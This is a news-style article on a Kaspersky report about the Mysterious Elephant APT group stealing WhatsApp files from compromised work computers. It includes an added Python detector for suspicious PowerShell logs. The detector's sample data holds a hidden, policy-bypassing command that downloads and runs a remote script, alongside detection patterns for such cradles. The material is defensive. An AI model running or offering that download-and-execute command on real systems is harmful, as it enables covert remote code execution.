The popularity of WhatsApp as a means of sharing work information has facilitated communication and the exchange of documents between employees and organizations. However, this same tool has become a growing target for sophisticated cyber threat groups that seek to extract confidential data from companies and institutions.
Kaspersky’s Global Research and Analysis Team (GReAT) detected a campaign orchestrated by the Mysterious Elephant group, classified as an APT (Advanced Persistent Threat), which threatens the security of institutional and government networks.
According to the investigation, the attackers do not directly breach WhatsApp’s infrastructure or its servers. Their approach is to compromise the computers that users rely on to access the application, especially those who use WhatsApp Desktop or the browser version on work computers.
Once they have taken control of the device, the criminals locate and extract files that have been sent or received through the messaging service, including documents, images and compressed archives.
This type of leak goes far beyond data loss. Exposure of information outside corporate channels can seriously harm an organization’s reputation, affect its operational stability and damage its relationships with customers and partners.
In addition, attackers can remain undetected for long periods, accumulating documents, credentials and sensitive material shared through everyday applications such as WhatsApp or browsers. Experts warn that this scenario can lead to quantifiable economic losses and a loss of trust that is difficult to recover, especially when the leaked data is critical or confidential.
The method adopted by Mysterious Elephant reflects a shift in targeted cybercrime tactics. According to Kaspersky, the group uses both proprietary tools and modified open-source components, continually adapting its infrastructure to evade traditional detection mechanisms.
Initial access is achieved through social engineering techniques: personalized emails, spear-phishing and infected documents capable of downloading malicious payloads when opened.
Once entry is obtained, the attackers deploy a chain of tools that allows them to gain privileges, move between systems and extract information without raising suspicion.
Among the resources detected, the use of PowerShell scripts stands out: PowerShell is a legitimate Windows utility that the attackers turn into a means of executing commands and downloading additional software covertly. These scripts frequently communicate with remote servers controlled by the criminals, which guarantees persistent, hidden access.
One of the key pieces used by Mysterious Elephant is the BabShell tool, which establishes a direct remote connection between the affected computer and the attackers, allowing remote control of the machine.
Using BabShell, the cybercriminals collect basic system and user data and execute instructions or install harmful programs. BabShell can also activate more sophisticated components, such as MemLoader HidenDesk, designed to execute malicious code directly in system memory without leaving traces on disk, which makes detecting and removing the threat even more complex.
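As an added illustration of how a defender might hunt for the PowerShell download-and-execute behaviour described above, the following example (not code from Kaspersky’s report or from the tools it names) scores constructed script-block log entries against a small set of indicators: network download cradles, in-memory execution, hidden windows, execution-policy bypass and encoded commands. The sample entries, the indicator list and the weights are assumptions made for this example.

```python
import re

# Constructed sample entries modelled on Windows PowerShell script-block logging.
# They are illustrative only, not artefacts from the campaign described above.
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Reports | Sort-Object LastWriteTime",
    "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass "
    "-Command \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')\"",
    "Invoke-WebRequest -Uri https://updates.example.internal/agent.msi -OutFile C:\\Temp\\agent.msi",
    "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
]

# Each indicator: (name, pattern, weight). Weights are assumptions for this example;
# a real detection rule would be tuned against the environment's baseline.
INDICATORS = [
    ("download_cradle", re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|Net\.WebClient", re.I), 2),
    ("in_memory_exec", re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
    ("hidden_window", re.compile(r"-W(indowStyle)?\s+Hidden", re.I), 1),
    ("policy_bypass", re.compile(r"-Exec(utionPolicy)?\s+Bypass", re.I), 1),
    # An encoded command hides its content from simple keyword matching, so it weighs more.
    ("encoded_command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("raw_ip_url", re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}", re.I), 1),
]


def score_script_block(text):
    """Return (score, list of matched indicator names) for one logged script block."""
    hits = [name for name, pattern, _ in INDICATORS if pattern.search(text)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    return score, hits


def flag_suspicious(blocks, threshold=3):
    """Return the indices of blocks whose combined indicator weight meets the threshold.

    A single legitimate download (e.g. an admin fetching an installer) scores below
    the threshold; the combination of cradle + in-memory execution + hidden window,
    or an encoded command on its own, is escalated for review.
    """
    return [i for i, block in enumerate(blocks) if score_script_block(block)[0] >= threshold]


if __name__ == "__main__":
    for i in flag_suspicious(SAMPLE_SCRIPT_BLOCKS):
        score, hits = score_script_block(SAMPLE_SCRIPT_BLOCKS[i])
        print(f"block {i}: score={score} indicators={hits}")
```

Running the block reports entries 1 and 3; the plain directory listing and the ordinary installer download are left alone.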
“The operation of this group is designed to go unnoticed and remain active even when attempts are made to stop it. Its infrastructure constantly changes, adapts quickly and makes it difficult for security teams to track it,” explained Fabio Assolini, director of Research and Analysis for Latin America at Kaspersky.
He added that the main threat lies not only in the theft of information, but also in the loss of control and visibility over activity within the institutional digital environment.
With the increase in these attacks, Kaspersky specialists suggest adopting a comprehensive defense strategy to protect both information and devices:
1. Strengthen email protection and check suspicious messages: Most of these attacks start with fake emails and infected documents. Implementing anti-phishing filters and carefully examining links before opening any file is essential.
2. Protect devices and limit the use of messaging: Keeping the software on all devices updated, avoiding the sharing of sensitive files outside corporate channels and restricting the use of applications such as WhatsApp for confidential information are the recommended measures.
3. Promote a security culture: Regular training allows staff to recognize social engineering attempts, deceptive emails and anomalous activity on their systems. The human factor remains the first line of defense against the sophistication of these threats.
The daily use of WhatsApp for work matters must be accompanied by new security practices, both technical and educational. Ignoring the risk can expose vital company information without users realizing it, putting operations, assets and reputation at risk.